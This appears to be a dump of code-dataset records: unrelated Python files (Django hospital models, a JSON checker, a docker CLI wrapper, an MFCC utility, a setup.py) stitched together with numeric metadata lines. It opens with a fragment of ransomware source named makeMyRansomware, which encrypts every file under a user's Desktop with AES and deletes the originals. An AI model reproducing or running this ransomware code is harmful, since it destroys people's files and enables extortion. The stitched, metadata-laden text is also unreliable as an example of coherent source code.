struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0] iv = infile.read(16) decryptor = AES.new(key, AES.MODE_CBC, iv) with open(out_filename, 'wb') as outfile: while True: chunk = infile.read(chunksize) if len(chunk) == 0: break outfile.write(decryptor.decrypt(chunk)) outfile.truncate(origsize) def Encryptor(self, startPath): for filename in glob.iglob(startPath, recursive=True): if(os.path.isfile(filename)): print('Encrypting> ' + filename) self.encrypt_file(self.key, filename) os.remove(filename) def Decryptor(self, startPath): for filename in glob.iglob(startPath, recursive=True): if(os.path.isfile(filename)): fname, ext = os.path.splitext(filename) if (ext == self.your_extension): print('Decrypting> ' + filename) self.decrypt_file(self.key, filename) os.remove(filename) if __name__ == "__main__": import time Ransom1 = makeMyRansomware(".Hello") startpath = 'c:/Users/'+Ransom1.username+'/Desktop/**' #You can encrypt or decrypt like this Ransom1.Encryptor(startpath) Ransom1.Decryptor(startpath)
33.287356
103
0.564917
324
2,896
4.932099
0.342593
0.055069
0.042553
0.022528
0.397998
0.397998
0.397998
0.216521
0.216521
0.1602
0
0.02551
0.323204
2,896
87
104
33.287356
0.789796
0.044199
0
0.333333
0
0
0.034795
0
0
0
0
0
0
1
0.083333
false
0.033333
0.083333
0
0.183333
0.033333
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
413c7bf5865a56e3f581e75a1fa2f6a01c3109a4
4,756
py
Python
hospital/models.py
mohitkyadav/calldoc
ebdcdcfac346e995c44cbf94a3c87c25ba594ee1
[ "MIT" ]
9
2019-05-19T14:00:03.000Z
2019-05-21T14:19:56.000Z
hospital/models.py
mohitkyadav/calldoc
ebdcdcfac346e995c44cbf94a3c87c25ba594ee1
[ "MIT" ]
8
2019-05-20T12:29:08.000Z
2022-02-10T11:06:55.000Z
hospital/models.py
mohitkyadav/calldoc
ebdcdcfac346e995c44cbf94a3c87c25ba594ee1
[ "MIT" ]
1
2019-05-20T07:04:20.000Z
2019-05-20T07:04:20.000Z
import uuid

from django.contrib.auth.models import User
from django.db import models
from django.urls import reverse
from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator

from landing.models import Profile


class Specialisation(models.Model):
    class Meta:
        ordering = ('id',)
        verbose_name = 'specialisation'
        verbose_name_plural = 'specialisations'

    id = models.CharField(unique=True, default=uuid.uuid4, editable=False,
                          max_length=50, primary_key=True)
    name = models.CharField(max_length=50)

    def __str__(self):
        return self.name


class Hospital(models.Model):
    class Meta:
        ordering = ('-rating',)
        verbose_name = 'Hospital'
        verbose_name_plural = 'Hospitals'

    user = models.OneToOneField(User, on_delete=models.CASCADE)
    name = models.CharField(max_length=1000, null=True, blank=True)
    address = models.TextField(max_length=5000, null=True, blank=True)
    slug = models.SlugField(unique=True, null=True, blank=True)
    rating = models.PositiveSmallIntegerField(default=3, validators=[
        MaxValueValidator(5),
        MinValueValidator(1),
    ])
    phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$',
                                 message="Phone number must be entered in the format:"
                                         " '+919999999999'.")
    email = models.EmailField(blank=True,
                              help_text="Please enter valid email address, it will be "
                                        "used for verification.")
    phone_number = models.CharField(validators=[phone_regex], max_length=17,
                                    blank=True,
                                    help_text="Please enter valid phone number.")
    specialisation = models.ManyToManyField(Specialisation,
                                            related_name='speciality_of_hospital')
    verified = models.BooleanField(default=False)

    def __str__(self):
        return self.user.first_name

    def get_url(self):
        return reverse('hospital:overview', args=[self.slug])

    def get_all_spec(self):
        specs = ""
        for spec in self.specialisation.all():
            specs += spec.name + ", "
        return specs[:-2]


class Doctor(models.Model):
    class Meta:
        ordering = ('name',)
        verbose_name = 'Doctor'
        verbose_name_plural = 'Doctors'

    user = models.OneToOneField(User, on_delete=models.CASCADE)
    name = models.CharField(max_length=1000, null=True, blank=True)
    address = models.TextField(max_length=5000, null=True, blank=True)
    slug = models.SlugField(unique=True, null=True, blank=True)
    rating = models.PositiveSmallIntegerField(default=3, validators=[
        MaxValueValidator(5),
        MinValueValidator(1),
    ])
    hospital = models.ForeignKey(Hospital, related_name='doctor',
                                 on_delete=models.CASCADE)
    specialisation = models.ManyToManyField(Specialisation, related_name='speciality')

    def __str__(self):
        return self.name

    def get_url(self):
        return reverse('hospital:doctor-home', args=[self.slug])

    def get_all_spec(self):
        specs = ""
        for spec in self.specialisation.all():
            specs += spec.name + ", "
        return specs[:-2]


class Appointment(models.Model):
    class Meta:
        ordering = ('-start_date',)
        verbose_name = 'Appointment'
        verbose_name_plural = 'Appointments'

    id = models.CharField(unique=True, default=uuid.uuid4, editable=False,
                          max_length=50, primary_key=True)
    doctor = models.ForeignKey(Doctor, on_delete=models.CASCADE, null=True)
    patient = models.ForeignKey(Profile, on_delete=models.CASCADE, null=True)
    start_date = models.DateTimeField(blank=True, null=True,
                                      help_text="You can choose dates from now")
    end_date = models.DateTimeField(blank=True, null=True,
                                    help_text="You can choose appointment "
                                              "duration as maximum of 7 days")
    patients_remarks = models.TextField(blank=True, null=True)
    doctors_remarks = models.TextField(blank=True, null=True)
    approved = models.BooleanField(default=False)
    rejected = models.BooleanField(default=False)
    rejection_cause = models.TextField(max_length=20000, blank=True, null=True)

    def __str__(self):
        return str(self.doctor.name + "-" + self.patient.user.first_name)

    def get_start_date(self):
        return self.start_date.date()

    def get_end_date(self):
        return self.end_date.date()
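A hedged usage sketch (Django shell, hypothetical data) of the helpers defined above: get_all_spec() joins the M2M specialisation names, and get_url() reverses the hospital overview route by slug.

# Assumes a populated database and the 'hospital' URL namespace from this app.
hospital = Hospital.objects.select_related('user').first()
if hospital is not None:
    print(hospital.get_all_spec())   # e.g. "Cardiology, Neurology"
    print(hospital.get_url())        # reversed from 'hospital:overview' + slug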
39.305785
114
0.625526
518
4,756
5.596525
0.258687
0.035874
0.028976
0.035185
0.595033
0.5188
0.483615
0.38565
0.359434
0.359434
0
0.016157
0.271236
4,756
120
115
39.633333
0.820254
0
0
0.43299
0
0
0.093566
0.004626
0
0
0
0
0
1
0.103093
false
0
0.061856
0.082474
0.649485
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
413d8e7168ec81d7fbf240777114a40652b16b3b
409
py
Python
anno-search-crawler/checker.py
powerslider/anno-search
b47ae5b4077d75622e088d3064e61934a8a3cf37
[ "Apache-2.0" ]
null
null
null
anno-search-crawler/checker.py
powerslider/anno-search
b47ae5b4077d75622e088d3064e61934a8a3cf37
[ "Apache-2.0" ]
null
null
null
anno-search-crawler/checker.py
powerslider/anno-search
b47ae5b4077d75622e088d3064e61934a8a3cf37
[ "Apache-2.0" ]
null
null
null
import os
import json

json_files = set()
errors = set()
dir = "extracted/json/"

for file in os.listdir(dir):
    if ".json" in file:
        json_files.add(file)
        with open(dir + file, "r") as f:
            j = json.loads("".join(f.read()))
            if j["entities"] == {} or j["text"] == "":
                errors.add(file)

print(errors or "All good. Scanned files: " + str(len(json_files)))
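The checker above flags a JSON extraction when its 'entities' dict or its 'text' field is empty. A sketch that fabricates both failure shapes so the checker has something to report; the file names and contents are illustrative.

import json
import os

os.makedirs("extracted/json", exist_ok=True)
# Case 1: entities missing entirely.
with open("extracted/json/empty-entities.json", "w") as f:
    json.dump({"entities": {}, "text": "some article body"}, f)
# Case 2: text missing entirely.
with open("extracted/json/empty-text.json", "w") as f:
    json.dump({"entities": {"PER": ["Ada"]}, "text": ""}, f)
# Running checker.py now prints both file names in the errors set.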
22.722222
67
0.545232
59
409
3.728814
0.542373
0.122727
0
0
0
0
0
0
0
0
0
0
0.278729
409
17
68
24.058824
0.745763
0
0
0
0
0
0.141809
0
0
0
0
0
0
1
0
false
0
0.153846
0
0.153846
0.076923
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
413ea01cee609cb192107f94528569476162e9b2
29,112
py
Python
labpack/platforms/docker.py
collectiveacuity/labPack
c8fb0d1ee23608f6dbcb99c232373eee886000fd
[ "MIT" ]
2
2017-06-20T15:20:46.000Z
2019-11-18T01:28:49.000Z
labpack/platforms/docker.py
collectiveacuity/labPack
c8fb0d1ee23608f6dbcb99c232373eee886000fd
[ "MIT" ]
null
null
null
labpack/platforms/docker.py
collectiveacuity/labPack
c8fb0d1ee23608f6dbcb99c232373eee886000fd
[ "MIT" ]
null
null
null
__author__ = 'rcj1492' __created__ = '2016.03' __license__ = 'MIT' from labpack.handlers.requests import requestsHandler class dockerClient(requestsHandler): _class_fields = { 'schema': { 'virtualbox_name': '', 'container_alias': '', 'image_name': '', 'image_tag': '', 'image_id': '', 'sys_command': '', 'environmental_variables': {}, 'envvar_key': '', 'envvar_value': '', 'mapped_ports': {}, 'port_key': '1000', 'port_value': '1000', 'mounted_volumes': {}, 'mount_field': '', 'start_command': '', 'network_name': '', 'run_flags': '' }, 'components': { '.envvar_key': { 'must_contain': [ '^[a-zA-Z_][a-zA-Z0-9_]+$' ], 'max_length': 255 }, '.envvar_value': { 'max_length': 32767 }, '.port_key': { 'contains_either': [ '\d{2,5}', '\d{2,5}\-\d{2,5}' ] }, '.port_value': { 'contains_either': [ '\d{2,5}', '\d{2,5}\-\d{2,5}' ] } } } def __init__(self, virtualbox_name='', verbose=False): ''' a method to initialize the dockerClient class :param virtualbox_name: [optional] string with name of virtualbox image :return: dockerClient object ''' title = '%s.__init__' % self.__class__.__name__ # construct super super(dockerClient, self).__init__() # construct fields model from jsonmodel.validators import jsonModel self.fields = jsonModel(self._class_fields) # validate inputs input_fields = { 'virtualbox_name': virtualbox_name } for key, value in input_fields.items(): if value: object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # construct properties self.vbox = virtualbox_name self.verbose = verbose # construct localhost from labpack.platforms.localhost import localhostClient self.localhost = localhostClient() # verbosity if self.verbose: print('Checking docker installation...', end='', flush=True) # validate docker installation self._validate_install() if self.verbose: print('.', end='', flush=True) # validate virtualbox installation self.vbox_running = self._validate_virtualbox() if self.verbose: print('.', end='', flush=True) # set virtualbox variables if self.vbox_running: self._set_virtualbox() if self.verbose: print('.', end='', flush=True) if self.verbose: print(' done.') def _validate_install(self): ''' a method to validate docker is installed ''' from subprocess import check_output, STDOUT sys_command = 'docker --help' try: check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8') # call(sys_command, stdout=open(devnull, 'wb')) except Exception as err: raise Exception('"docker" not installed. GoTo: https://www.docker.com') return True def _validate_virtualbox(self): ''' a method to validate that virtualbox is running on Win 7/8 machines :return: boolean indicating whether virtualbox is running ''' # validate operating system if self.localhost.os.sysname != 'Windows': return False win_release = float(self.localhost.os.release) if win_release >= 10.0: return False # validate docker-machine installation from os import devnull from subprocess import call, check_output, STDOUT sys_command = 'docker-machine --help' try: check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8') except Exception as err: raise Exception('Docker requires docker-machine to run on Win7/8. GoTo: https://www.docker.com') # validate virtualbox is running sys_command = 'docker-machine status %s' % self.vbox try: vbox_status = check_output(sys_command, shell=True, stderr=open(devnull, 'wb')).decode('utf-8').replace('\n', '') except Exception as err: if not self.vbox: raise Exception('Docker requires VirtualBox to run on Win7/8. 
GoTo: https://www.virtualbox.org') elif self.vbox == "default": raise Exception('Virtualbox "default" not found. Container will not start without a valid virtualbox.') else: raise Exception('Virtualbox "%s" not found. Try using "default" instead.' % self.vbox) if 'Stopped' in vbox_status: raise Exception('Virtualbox "%s" is stopped. Try first running: docker-machine start %s' % (self.vbox, self.vbox)) return True def _set_virtualbox(self): ''' a method to set virtualbox environment variables for docker-machine :return: True ''' from os import environ if not environ.get('DOCKER_CERT_PATH'): import re sys_command = 'docker-machine env %s' % self.vbox cmd_output = self.command(sys_command) variable_list = ['DOCKER_TLS_VERIFY', 'DOCKER_HOST', 'DOCKER_CERT_PATH', 'DOCKER_MACHINE_NAME'] for variable in variable_list: env_start = '%s="' % variable env_end = '"\\n' env_regex = '%s.*?%s' % (env_start, env_end) env_pattern = re.compile(env_regex) env_statement = env_pattern.findall(cmd_output) env_var = env_statement[0].replace(env_start, '').replace('"\n', '') environ[variable] = env_var return True def _images(self, sys_output): ''' a helper method for parsing docker image output ''' import re gap_pattern = re.compile('\t|\s{2,}') image_list = [] output_lines = sys_output.split('\n') column_headers = gap_pattern.split(output_lines[0]) for i in range(1,len(output_lines)): columns = gap_pattern.split(output_lines[i]) if len(columns) == len(column_headers): image_details = {} for j in range(len(columns)): image_details[column_headers[j]] = columns[j] image_list.append(image_details) return image_list def _ps(self, sys_output): ''' a helper method for parsing docker ps output ''' import re gap_pattern = re.compile('\t|\s{2,}') container_list = [] output_lines = sys_output.split('\n') column_headers = gap_pattern.split(output_lines[0]) for i in range(1,len(output_lines)): columns = gap_pattern.split(output_lines[i]) container_details = {} if len(columns) > 1: for j in range(len(column_headers)): container_details[column_headers[j]] = '' if j <= len(columns) - 1: container_details[column_headers[j]] = columns[j] # stupid hack for possible empty port column if container_details['PORTS'] and not container_details['NAMES']: from copy import deepcopy container_details['NAMES'] = deepcopy(container_details['PORTS']) container_details['PORTS'] = '' container_list.append(container_details) return container_list def _synopsis(self, container_settings, container_status=''): ''' a helper method for summarizing container settings ''' # compose default response settings = { 'container_status': container_settings['State']['Status'], 'container_exit': container_settings['State']['ExitCode'], 'container_ip': container_settings['NetworkSettings']['IPAddress'], 'image_name': container_settings['Config']['Image'], 'container_alias': container_settings['Name'].replace('/',''), 'container_variables': {}, 'mapped_ports': {}, 'mounted_volumes': {}, 'container_networks': [] } # parse fields nested in container settings import re num_pattern = re.compile('\d+') if container_settings['NetworkSettings']['Ports']: for key, value in container_settings['NetworkSettings']['Ports'].items(): if value: port = num_pattern.findall(value[0]['HostPort'])[0] settings['mapped_ports'][port] = num_pattern.findall(key)[0] elif container_settings['HostConfig']['PortBindings']: for key, value in container_settings['HostConfig']['PortBindings'].items(): port = num_pattern.findall(value[0]['HostPort'])[0] settings['mapped_ports'][port] = 
num_pattern.findall(key)[0] if container_settings['Config']['Env']: for variable in container_settings['Config']['Env']: k, v = variable.split('=') settings['container_variables'][k] = v for volume in container_settings['Mounts']: system_path = volume['Source'] container_path = volume['Destination'] settings['mounted_volumes'][system_path] = container_path if container_settings['NetworkSettings']: if container_settings['NetworkSettings']['Networks']: for key in container_settings['NetworkSettings']['Networks'].keys(): settings['container_networks'].append(key) # determine stopped status if settings['container_status'] == 'exited': if not container_status: try: from subprocess import check_output, STDOUT sys_command = 'docker logs --tail 1 %s' % settings['container_alias'] check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8') settings['container_status'] = 'stopped' except: pass else: settings['container_status'] = container_status return settings def images(self): ''' a method to list the local docker images :return: list of dictionaries with available image fields [ { 'CREATED': '7 days ago', 'TAG': 'latest', 'IMAGE ID': '2298fbaac143', 'VIRTUAL SIZE': '302.7 MB', 'REPOSITORY': 'test1' } ] ''' sys_command = 'docker images' sys_output = self.command(sys_command) image_list = self._images(sys_output) return image_list def ps(self): ''' a method to list the local active docker containers :return: list of dictionaries with active container fields [{ 'CREATED': '6 minutes ago', 'NAMES': 'flask', 'PORTS': '0.0.0.0:5000->5000/tcp', 'CONTAINER ID': '38eb0bbeb2e5', 'STATUS': 'Up 6 minutes', 'COMMAND': '"gunicorn --chdir ser"', 'IMAGE': 'rc42/flaskserver' }] ''' sys_command = 'docker ps -a' sys_output = self.command(sys_command) container_list = self._ps(sys_output) return container_list def network_ls(self): ''' a method to list the available networks :return: list of dictionaries with docker network fields [{ 'NETWORK ID': '3007476acfe5', 'NAME': 'bridge', 'DRIVER': 'bridge', 'SCOPE': 'local' }] ''' import re gap_pattern = re.compile('\t|\s{2,}') network_list = [] sys_command = 'docker network ls' output_lines = self.command(sys_command).split('\n') column_headers = gap_pattern.split(output_lines[0]) for i in range(1,len(output_lines)): columns = gap_pattern.split(output_lines[i]) network_details = {} if len(columns) > 1: for j in range(len(column_headers)): network_details[column_headers[j]] = '' if j <= len(columns) - 1: network_details[column_headers[j]] = columns[j] network_list.append(network_details) return network_list def inspect_container(self, container_alias): ''' a method to retrieve the settings of a container :param container_alias: string with name or id of container :return: dictionary of settings of container { TOO MANY TO LIST } ''' title = '%s.inspect_container' % self.__class__.__name__ # validate inputs input_fields = { 'container_alias': container_alias } for key, value in input_fields.items(): object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # send inspect command import json sys_command = 'docker inspect %s' % container_alias output_dict = json.loads(self.command(sys_command)) container_settings = output_dict[0] return container_settings def inspect_image(self, image_name, image_tag=''): ''' a method to retrieve the settings of an image :param image_name: string with name or id of image :param image_tag: [optional] string with tag associated with image :return: dictionary of settings of image { TOO 
MANY TO LIST } ''' title = '%s.inspect_image' % self.__class__.__name__ # validate inputs input_fields = { 'image_name': image_name, 'image_tag': image_tag } for key, value in input_fields.items(): if value: object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # determine system command argument sys_arg = image_name if image_tag: sys_arg += ':%s' % image_tag # run inspect command import json sys_command = 'docker inspect %s' % sys_arg output_dict = json.loads(self.command(sys_command)) image_settings = output_dict[0] return image_settings def rm(self, container_alias): ''' a method to remove an active container :param container_alias: string with name or id of container :return: string with container id ''' title = '%s.rm' % self.__class__.__name__ # validate inputs input_fields = { 'container_alias': container_alias } for key, value in input_fields.items(): object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # run remove command sys_cmd = 'docker rm -f %s' % container_alias output_lines = self.command(sys_cmd).split('\n') return output_lines[0] def rmi(self, image_id): ''' a method to remove an image :param image_name: string with id of image :return: list of strings with image layers removed ''' title = '%s.rmi' % self.__class__.__name__ # validate inputs input_fields = { 'image_id': image_id } for key, value in input_fields.items(): object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # send remove command sys_cmd = 'docker rmi %s' % image_id output_lines = self.command(sys_cmd).split('\n') return output_lines def ip(self): ''' a method to retrieve the ip of system running docker :return: string with ip address of system ''' if self.localhost.os.sysname == 'Windows' and float(self.localhost.os.release) < 10: sys_cmd = 'docker-machine ip %s' % self.vbox system_ip = self.command(sys_cmd).replace('\n','') else: system_ip = self.localhost.ip return system_ip def search(self, image_name): # run docker search sys_command = 'docker search %s' % image_name shell_output = self._handle_command(sys_command) # parse table from labpack.parsing.shell import convert_table image_list = convert_table(shell_output) return image_list def build(self, image_name, image_tag='', dockerfile_path='./Dockerfile'): # construct sys command arguments from os import path tag_insert = '' if image_tag: tag_insert = ':%s' % image_tag path_root, path_node = path.split(dockerfile_path) sys_command = 'docker build -t %s%s -f %s %s' % (image_name, tag_insert, path_node, path_root) # determine verbosity print_pipe = False if self.verbose: print_pipe = True else: sys_command += ' -q' # run command shell_output = self._handle_command(sys_command, print_pipe=print_pipe) return shell_output def save(self, image_name, file_name, image_tag=''): sys_command = 'docker save -o %s %s' % (file_name, image_name) if image_tag: sys_command += ':%s' % image_tag return self.command(sys_command) def command(self, sys_command): ''' a method to run a system command in a separate shell :param sys_command: string with docker command :return: string output from docker ''' title = '%s.command' % self.__class__.__name__ # validate inputs input_fields = { 'sys_command': sys_command } for key, value in input_fields.items(): object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) from subprocess import check_output, STDOUT, 
CalledProcessError try: output = check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8') except CalledProcessError as err: raise Exception(err.output.decode('ascii', 'ignore')) return output def synopsis(self, container_alias): ''' a method to summarize key configuration settings required for docker compose :param container_alias: string with name or id of container :return: dictionary with values required for module configurations ''' title = '%s.synopsis' % self.__class__.__name__ # validate inputs input_fields = { 'container_alias': container_alias } for key, value in input_fields.items(): object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # retrieve container settings container_settings = self.inspect_container(container_alias) # summarize settings settings = self._synopsis(container_settings) return settings def enter(self, container_alias): ''' a method to open up a terminal inside a running container :param container_alias: string with name or id of container :return: None ''' title = '%s.enter' % self.__class__.__name__ # validate inputs input_fields = { 'container_alias': container_alias } for key, value in input_fields.items(): object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # compose system command from os import system sys_cmd = 'docker exec -it %s sh' % container_alias if self.localhost.os.sysname in ('Windows'): sys_cmd = 'winpty %s' % sys_cmd # open up terminal system(sys_cmd) def run(self, image_name, container_alias, image_tag='', environmental_variables=None, mapped_ports=None, mounted_volumes=None, start_command='', network_name='', run_flags=''): ''' a method to start a local container :param image_name: string with name or id of image :param container_alias: string with name to assign to container :param image_tag: [optional] string with tag assigned to image :param environmental_variables: [optional] dictionary of envvar fields to add to container :param mapped_ports: [optional] dictionary of port fields to map to container :param mounted_volumes: [optional] dictionary of path fields to map to container :param start_command: [optional] string of command (and any arguments) to run inside container :param network_name: [optional] string with name of docker network to link container to :param run_flags: [optional] string with additional docker options to add to container :return: string with container id NOTE: valid characters for environmental variables key names follow the shell standard of upper and lower alphanumerics or underscore and cannot start with a numerical value. NOTE: ports are mapped such that the key name is the system port and the value is the port inside the container. both must be strings of digits. NOTE: volumes are mapped such that the key name is the absolute or relative system path and the value is the absolute path inside the container. both must be strings. 
NOTE: additional docker options: --entrypoint overrides existing entrypoint command --rm removes container once start command exits --log-driver sets system logging settings for the container https://docs.docker.com/engine/reference/run ''' title = '%s.run' % self.__class__.__name__ # validate inputs input_fields = { 'image_name': image_name, 'container_alias': container_alias, 'image_tag': image_tag, 'environmental_variables': environmental_variables, 'mapped_ports': mapped_ports, 'mounted_volumes': mounted_volumes, 'start_command': start_command, 'network_name': network_name, 'run_flags': run_flags } for key, value in input_fields.items(): if value: object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # validate subfields if environmental_variables: for key, value in environmental_variables.items(): key_title = '%s(environmental_variables={%s:...})' % (title, key) self.fields.validate(key, '.envvar_key', key_title) value_title = '%s(environmental_variables={%s:%s})' % (title, key, str(value)) self.fields.validate(value, '.envvar_value', value_title) else: environmental_variables = {} if mapped_ports: for key, value in mapped_ports.items(): key_title = '%s(mapped_ports={%s:...})' % (title, key) self.fields.validate(key, '.port_key', key_title) value_title = '%s(mapped_ports={%s:%s})' % (title, key, str(value)) self.fields.validate(value, '.port_value', value_title) else: mapped_ports = {} if mounted_volumes: for key, value in mounted_volumes.items(): key_title = '%s(mounted_volumes={%s:...})' % (title, key) self.fields.validate(key, '.mount_field', key_title) value_title = '%s(mounted_volumes={%s:%s})' % (title, key, str(value)) self.fields.validate(value, '.mount_field', value_title) else: mounted_volumes = {} # TODO verify image exists (locally or remotely) ??? # verify alias does not exist for container in self.ps(): if container['NAMES'] == container_alias: raise ValueError('%s(container_alias="%s") already exists. Try first: docker rm -f %s' % (title, container_alias, container_alias)) # verify network exists network_exists = False for network in self.network_ls(): if network['NAME'] == network_name: network_exists = True if network_name and not network_exists: raise ValueError('%s(network_name="%s") does not exist. Try first: docker network create %s' % (title, network_name, network_name)) # verify system paths and compose absolute path mount map absolute_mounts = {} from os import path for key, value in mounted_volumes.items(): if not path.exists(key): raise ValueError('%s(mounted_volume={%s:...}) is not a valid path on localhost.' 
% (title, key)) absolute_path = path.abspath(key) if self.localhost.os.sysname == 'Windows': absolute_path = '"/%s"' % absolute_path else: absolute_path = '"%s"' % absolute_path absolute_mounts[absolute_path] = '"%s"' % value # compose run command sys_cmd = 'docker run --name %s' % container_alias for key, value in environmental_variables.items(): sys_cmd += ' -e %s=%s' % (key.upper(), value) for key, value in mapped_ports.items(): sys_cmd += ' -p %s:%s' % (key, value) for key, value in absolute_mounts.items(): sys_cmd += ' -v %s:%s' % (key, value) if network_name: sys_cmd += ' --network %s' % network_name if run_flags: sys_cmd += ' %s' % run_flags.strip() sys_cmd += ' -d %s' % image_name if image_tag: sys_cmd += ':%s' % image_tag if start_command: sys_cmd += ' %s' % start_command.strip() # run run command output_lines = self.command(sys_cmd).split('\n') return output_lines[0] if __name__ == '__main__': # test docker client init from pprint import pprint docker_client = dockerClient() # test docker list methods images = docker_client.images() print(images) containers = docker_client.ps() print(containers) networks = docker_client.network_ls() print(networks) remote_images = docker_client.search('alpine') print(remote_images) # # test docker run # from labpack.records.settings import load_settings # docker_config = load_settings('../../data/test_docker.yaml') # container_id = docker_client.run( # image_name=docker_config['image_name'], # container_alias=docker_config['container_alias'], # environmental_variables=docker_config['envvar'], # mounted_volumes=docker_config['mounts'], # mapped_ports=docker_config['ports'], # start_command=docker_config['command'] # ) # print(container_id) # # # wait for container to start # from time import sleep # sleep(1) # test docker synopsis for container in containers: settings = docker_client.synopsis(container['CONTAINER ID']) pprint(settings) # test enter and rm from separate script print('************\nRUN python test_platforms_docker_enter.py to test enter and rm functionality' )
36.897338
182
0.561384
3,145
29,112
4.991097
0.128458
0.022934
0.012614
0.014907
0.401988
0.342804
0.288781
0.228069
0.212079
0.183411
0
0.006401
0.33457
29,112
788
183
36.944162
0.803892
0.208505
0
0.327354
0
0.002242
0.146633
0.016376
0
0
0
0.001269
0
1
0.049327
false
0.002242
0.049327
0
0.152466
0.033632
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
413f75cca22078b8921f0960e0731176326021d4
947
py
Python
classical_models/util_functions.py
leejaeka/sound_classifier
121bc11522514ed45e5ad74c4c3ffdb0e87cd688
[ "Apache-2.0" ]
null
null
null
classical_models/util_functions.py
leejaeka/sound_classifier
121bc11522514ed45e5ad74c4c3ffdb0e87cd688
[ "Apache-2.0" ]
null
null
null
classical_models/util_functions.py
leejaeka/sound_classifier
121bc11522514ed45e5ad74c4c3ffdb0e87cd688
[ "Apache-2.0" ]
null
null
null
import numpy as np
import pandas as pd


def load_data(dataset='training', path='../data_processed/'):
    return pd.read_pickle(path + dataset + '_set.pkl')


def process_files_to_mfccs(dataset='training', path='../data_processed/', target_column='mfccs'):
    df = load_data(dataset=dataset, path=path)
    labels, files, column_values = [], [], []
    for index, row in df.iterrows():
        # iterate over the frames (columns) of each file's feature matrix;
        # target_column was previously hard-coded as 'mfccs' in the loop body
        for f in range(row[target_column].shape[1]):
            labels.append(row['Label'])
            files.append(index)
            column_values.append(row[target_column][:, f])
    df = pd.DataFrame({'File_id': files, 'Label': labels, 'column_values': column_values})
    # Make the lists inside the target column into independent columns,
    # while keeping the file_id and label
    features_df = pd.concat([df['column_values'].apply(pd.Series), df['File_id'], df['Label']], axis=1)
    features_df = features_df.set_index('File_id')
    return features_df
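A toy example of the reshaping this performs, using made-up data (the path and pickle name are only what load_data() assumes; the directory must exist):

import numpy as np
import pandas as pd

# two files, each with a 13-coefficient x 4-frame MFCC matrix
toy = pd.DataFrame({
    'Label': ['dog', 'cat'],
    'mfccs': [np.random.rand(13, 4), np.random.rand(13, 4)],
}, index=['file_a', 'file_b'])
toy.to_pickle('../data_processed/training_set.pkl')

features = process_files_to_mfccs('training')
print(features.shape)  # (8, 14): one row per frame, 13 MFCC columns plus Label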
37.88
114
0.669483
134
947
4.552239
0.432836
0.098361
0.04918
0.07541
0.104918
0
0
0
0
0
0
0.002571
0.178458
947
24
115
39.458333
0.781491
0.1151
0
0
0
0
0.16368
0
0
0
0
0
0
1
0.125
false
0
0.125
0.0625
0.375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
414012d7a8b9a151ce80cbbbd219f43643543cf6
1,395
py
Python
setup.py
chembl/chembl_assay_matrix
f8f48e2fd22cde19f0bc6da3052e94952a5d7df3
[ "Apache-2.0" ]
2
2017-12-02T12:14:10.000Z
2020-09-30T17:49:37.000Z
setup.py
chembl/chembl_assay_matrix
f8f48e2fd22cde19f0bc6da3052e94952a5d7df3
[ "Apache-2.0" ]
null
null
null
setup.py
chembl/chembl_assay_matrix
f8f48e2fd22cde19f0bc6da3052e94952a5d7df3
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python
# -*- coding: utf-8 -*-

__author__ = 'mnowotka'

import sys

try:
    from setuptools import setup
except ImportError:
    from ez_setup import use_setuptools
    use_setuptools()
    from setuptools import setup

# enforce the interpreter range stated in the error message (2.7.3 - 2.7.7 inclusive);
# the original condition used >= (2, 7, 7), which wrongly rejected 2.7.7 itself
if sys.version_info < (2, 7, 3) or sys.version_info > (2, 7, 7):
    raise Exception('ChEMBL software stack requires python 2.7.3 - 2.7.7')

setup(
    name='chembl-assay-network',
    version='0.8.1',
    author='Michal Nowotka',
    author_email='mnowotka@ebi.ac.uk',
    description='Python package generating compound co-occurrence matrix for all assays from given document',
    url='https://www.ebi.ac.uk/chembldb/index.php/ws',
    license='CC BY-SA 3.0',
    packages=['chembl_assay_network'],
    long_description=open('README.rst').read(),
    install_requires=[
        'chembl-core-model>=0.8.3',
        'numpy>=1.7.1',
        'scipy',
    ],
    include_package_data=True,
    classifiers=[
        'Development Status :: 2 - Pre-Alpha',
        'Environment :: Web Environment',
        'Framework :: Django',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: Apache Software License',
        'Operating System :: POSIX :: Linux',
        'Programming Language :: Python :: 2.7',
        'Topic :: Scientific/Engineering :: Chemistry',
    ],
    zip_safe=False,
)
32.44186
108
0.614337
168
1,395
5
0.642857
0.011905
0.047619
0.059524
0.038095
0
0
0
0
0
0
0.025739
0.248029
1,395
43
109
32.44186
0.775024
0.030108
0
0.055556
0
0
0.451923
0.034024
0
